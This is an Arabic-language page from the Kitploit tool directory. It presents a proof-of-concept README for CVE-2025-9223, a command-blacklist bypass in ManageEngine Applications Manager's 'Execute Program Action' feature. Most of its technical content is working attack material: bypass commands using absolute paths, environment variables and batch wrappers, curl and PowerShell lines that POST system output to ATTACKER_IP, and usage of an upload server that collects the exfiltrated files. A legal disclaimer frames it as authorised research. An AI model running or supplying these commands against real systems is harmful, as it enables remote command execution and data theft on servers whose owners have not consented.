Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-9223 — إثبات المفهوم لـ CVE-2025-9223 | Kitploit
أدوات/GitHubGitHub/networkkiller/cve-2025-9223
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتاختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHubnetworkkiller/cve-2025-9223

CVE-2025-9223

إثبات المفهوم لـ CVE-2025-9223

عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Applications Manager - Execute Program Action Bypass PoC

Security Research Python 3.x Proof of Concept

📖 الوصف

يحتوي هذا المستودع على إثبات المفهوم (PoC) الذي يوضح ثغرة تنفيذ أوامر في وظيفة "Execute Program Action" في ManageEngine Applications Manager.

🔍 تفاصيل الثغرة

يستخدم Applications Manager قائمة سوداء (BlackListCommands) لحظر الأوامر الخطيرة، لكن التحقق به عيوب حرجة:

  • التحقق القائم على السلاسل فقط في أول رمز (token)
  • لا تطبيع للمسارات أو توسيع متغيرات البيئة
  • لا حماية ضد التنفيذ غير المباشر عبر السكريبتات

🚨 طرق الالتفاف (Bypass)

الطريقةالمثال
المسار المطلقC:\Windows\System32\netstat.exe
متغيرات البيئة%SystemRoot%\System32\netstat.exe
سكريبت غلافecho netstat > a.bat && a.bat

💥 التأثير

  • ✅ تنفيذ تعليمات برمجية عن بُعد (RCE) موثَّق على مضيف Applications Manager
  • ✅ تنفيذ كامل لأوامر النظام متجاوزاً قيود الأمان
  • ✅ استخراج البيانات باستخدام أدوات النظام (curl, powershell, certutil)

📤 مثال على حمولة استخراج البيانات

root@kitploit:~
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload

🛠️ الإعداد والاستخدام

المتطلبات الأساسية

  • Python 3.x
  • وصول شبكي إلى مثيل Applications Manager الهدف
  • وصول موثَّق مع صلاحيات "Execute Program Action"

خادم رفع الملفات

السكريبت upload_server.py يوفر خادم HTTP بسيط لاستقبال الملفات المستخرجة.

الاستخدام الأساسي

root@kitploit:~
python3 upload_server.py

الخيارات المتقدمة

root@kitploit:~
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads

الوسائط

  • --host: عنوان الربط (الافتراضي: 0.0.0.0)
  • --port: منفذ HTTP (الافتراضي: 8000)
  • --dir: مجلد الإخراج (الافتراضي: المجلد الحالي)

نقاط نهاية API

ميزات الأمان

✅ حماية ضد اجتياز المسار (path traversal)
✅ أسماء ملفات فريدة مع طابع زمني
✅ تسجيل الطلبات مع IP و User-Agent
✅ التحقق من نوع المحتوى

🎯 أوامر الاختبار

أنشئ ملف test_commands.txt بأمثلة الالتفاف:

root@kitploit:~
# Bypass with absolute path
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an

# Bypass with environment variables
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe

# Bypass with script wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat

# Data exfiltration examples
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"

⚠️ إخلاء مسؤولية قانوني

هام: هذه الأداة مقدمة لأغراض تعليمية واختبارات مصرح بها فقط.

❌ لا تستخدم على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها
❌ لا تستخدم لأي نشاط غير قانوني
✅ نعم استخدم فقط في بيئات خاضعة للرقابة لأبحاث أمنية
✅ نعم احصل على التصريح المناسب قبل إجراء الاختبارات

الكاتب غير مسؤول عن أي استخدام خاطئ لهذه الأداة. يتحمل المستخدمون كامل المسؤولية والمخاطرة.

📄 الترخيص

هذا المشروع لأغراض البحث والتعليم فقط. جميع الحقوق محفوظة.

👨‍💻 المؤلف

Johan Aybar - للأغراض التعليمية


⚠️ تذكير: يجب استخدام هذا الإثبات (PoC) فقط في بيئات اختبار مصرح بها. الاستخدام غير المصرح به قد يكون غير قانوني وممنوع بشدة.

تنزيل الأداة
الطريقة
نقطة النهاية
الوصف
GET/يسرد الملفات المرفوعة مؤخراً
POST/uploadرفع الملفات (multipart/form-data)
PUT/upload/[filename]تحميل مباشر للملفات